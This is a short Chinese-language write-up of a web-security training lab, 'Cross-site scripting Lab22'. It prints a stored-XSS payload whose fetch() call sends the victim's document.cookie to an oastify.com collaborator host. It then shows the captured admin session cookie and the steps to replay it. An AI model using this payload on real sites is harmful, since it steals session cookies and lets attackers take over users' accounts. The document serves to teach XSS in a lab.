# Cross-site scripting Lab22 本題是利用 Stored XSS 來竊取受害者(管理員)的 session cookie,然後偽造身份登入他帳號。 一樣先進入網站。 ![image](https://hackmd.io/_uploads/HJLLtbmBlx.png) 在填表單前,我們先進去拿我們的子網域,等等收取回傳資料需要。 ``` 7aijy78ipb17azjuj71fjnm3xu3lrff4.oastify.com ``` 複製好後,我們去提交表單來偷資料。 ```javascript <script> fetch('https://7aijy78ipb17azjuj71fjnm3xu3lrff4.oastify.com', { method: 'POST', mode: 'no-cors', body: document.cookie }); </script> ``` - `mode: 'no-cors'` 是為了避免瀏覽器阻擋跨來源請求。 - 用 fetch 而不是 XMLHttpRequest 是比較可靠的方式。 ![image](https://hackmd.io/_uploads/BJzOcZmHgl.png) ![image](https://hackmd.io/_uploads/r1dFaWmSge.png) ``` hhBjWEHQKe4QtAGh5t015xHOYYq7BJdQ ``` 把這組 Cookie 寫入請求中的 Cookie 值,來嘗試進入 admin 帳號。 ![image](https://hackmd.io/_uploads/H11WRbXBgx.png) ![image](https://hackmd.io/_uploads/SJJCaZQHll.png) ![image](https://hackmd.io/_uploads/SkK-AW7Sgl.png) ---